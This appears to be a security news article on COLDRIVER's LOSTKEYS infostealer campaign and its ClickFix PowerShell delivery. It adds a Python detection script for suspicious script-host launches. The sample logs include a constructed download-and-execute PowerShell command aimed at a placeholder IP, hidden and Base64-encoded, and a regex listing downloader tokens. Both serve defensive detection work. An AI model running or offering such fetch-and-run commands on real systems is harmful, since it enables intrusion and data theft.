Google Threat Intelligence Group (GTIG) has documented a new malware campaign attributed to the Russia-linked threat group COLDRIVER, also tracked as Star Blizzard, Callisto and UNC4057. The malware, named LOSTKEYS, was observed in January, March and April 2025 against targets that fit the group's long-standing profile: current and former advisers to Western governments and militaries, journalists, think tanks and NGOs, and individuals connected to Ukraine.
LOSTKEYS is an information stealer. It collects files matching a hard-coded list of extensions and directories and sends them, together with system information and the list of running processes, to attacker-controlled infrastructure. It does not rely on an exploit in office software: the delivery GTIG observed is a social-engineering lure, a fake CAPTCHA page that tells the visitor to prove they are human by pasting a PowerShell command into the Windows Run dialog (the technique commonly called ClickFix). The user, not a document parser, runs the first stage.
Once that command runs, a multi-stage chain follows. The first-stage PowerShell fetches a second stage that computes a hash of the device's display resolution and stops on values associated with virtual machines, a simple sandbox check. The third stage retrieves Base64-encoded blobs, decodes them with a key specific to that infection chain, and writes out the final payload, a Visual Basic Script. Because every step is script-based and executed by built-in Windows interpreters, nothing is dropped that conventional file-based antivirus is tuned to catch, which is why defenders should look at process lineage and command lines rather than binaries.
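The detection logic a defender would want for a chain like this is a process-creation check: flag a script host (PowerShell, cmd, wscript, mshta) that is launched either by a document handler or from the Run dialog with an encoded or download-and-execute command line, and decode the encoded command so the analyst can read it. The following is an added example written for this article, not code from GTIG or from the LOSTKEYS report. The pipe-delimited log format, the host names, the IP address and the encoded first-stage command are all constructed here for illustration; the parent and child process lists are the author's own choices.

```python
"""Flag process-creation events consistent with a script-based, multi-stage infection chain."""
import base64
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Parents that should almost never launch a script host directly (assumed list).
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# A command pasted into the Run dialog shows up as a child of explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell's -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
# Tokens typical of a download-and-execute first stage.
SUSPICIOUS_TOKENS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|downloadstring|downloadfile|invoke-webrequest|"
    r"invoke-expression|\biex\b|frombase64string|\bcurl\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


def _value(field: str) -> str:
    return field.split("=", 1)[1]


def parse_event(line: str) -> ProcEvent:
    """Parse one 'ts|host|parent=..|image=..|cmdline=..' record (constructed log format)."""
    ts, host, parent, image, cmdline = line.rstrip("\n").split("|", 4)
    return ProcEvent(ts, host, _value(parent), _value(image), _value(cmdline))


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument (UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcEvent) -> List[str]:
    """Reasons an event looks like a first-stage script launch; empty list means benign."""
    child, parent = basename(ev.image), basename(ev.parent)
    if child not in SCRIPT_HOSTS:
        return []
    reasons = []
    if parent in DOCUMENT_PARENTS:
        reasons.append(f"{child} spawned by document handler {parent}")
    decoded = decode_encoded_command(ev.cmdline)
    # Search the visible command line (with the Base64 blob removed) plus the decoded text.
    text = ENCODED_ARG.sub("", ev.cmdline) + " " + (decoded or "")
    hits = sorted({h.lower() for h in SUSPICIOUS_TOKENS.findall(text)})
    if decoded is not None:
        hits.insert(0, "encoded command")
    if hits:
        where = "Run dialog (explorer.exe parent)" if parent == RUN_DIALOG_PARENT else parent
        reasons.append(f"{child} from {where} with {', '.join(hits)}")
    return reasons


def scan(lines: Iterable[str]) -> List[Tuple[ProcEvent, List[str]]]:
    flagged = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample telemetry (not real logs). The first stage is a made-up downloader
# pointing at a documentation-range IP; it is encoded the way PowerShell expects.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
STAGE1_B64 = base64.b64encode(STAGE1.encode("utf-16-le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_LOG = [
    # benign: user opened an interactive PowerShell from the shell
    f"2025-03-04T09:58:12Z|WS-17|parent=C:\\Windows\\explorer.exe|image={PS}|cmdline=powershell.exe",
    # ClickFix-style: hidden, encoded downloader launched from the Run dialog
    f"2025-03-04T10:12:33Z|WS-17|parent=C:\\Windows\\explorer.exe|image={PS}"
    f"|cmdline=powershell.exe -w hidden -nop -e {STAGE1_B64}",
    # document handler spawning a shell
    "2025-03-04T10:31:07Z|WS-22|parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|image=C:\\Windows\\System32\\cmd.exe|cmdline=cmd.exe /c start wscript.exe C:\\Users\\Public\\update.vbs",
    # unrelated system noise
    "2025-03-04T10:31:09Z|WS-22|parent=C:\\Windows\\System32\\svchost.exe"
    "|image=C:\\Windows\\System32\\conhost.exe|cmdline=conhost.exe 0x4",
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_LOG):
        print(f"{ev.ts} {ev.host}: {'; '.join(reasons)}")
```

The interactive PowerShell launch is deliberately left unflagged: explorer.exe spawning a script host is common, and it is the combination with a hidden window, an encoded command or a download-and-execute token that separates a pasted Run-dialog payload from normal use. In production the same logic maps onto Sysmon event ID 1 or EDR process-creation telemetry, where the parent image and command line are already separate fields.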
The campaign was identified by GTIG researchers, who published their analysis in May 2025. The write-up describes the obfuscation used across the stages, the per-chain decoding keys, and command-and-control infrastructure that the article characterises as routing through compromised legitimate websites so that the origin of the activity is harder to trace.
The practical impact is data theft: documents matching the malware's target list, system details and process listings leave the host, and affected organisations have reported loss of sensitive files and exposure of private communications. Because the chain lives in scripts run by built-in interpreters rather than in a dropped executable, victims can go unaware for long periods, and the operators keep collecting for as long as the access holds.
Security agencies in several countries have previously warned about this group; the UK NCSC and partners published an advisory on Star Blizzard's spear-phishing in December 2023. LOSTKEYS is a step beyond COLDRIVER's usual credential-phishing tradecraft into custom malware, but the victim profile is unchanged and aligns with Russian intelligence collection interests, which is a large part of why GTIG attributes the activity to the group with confidence.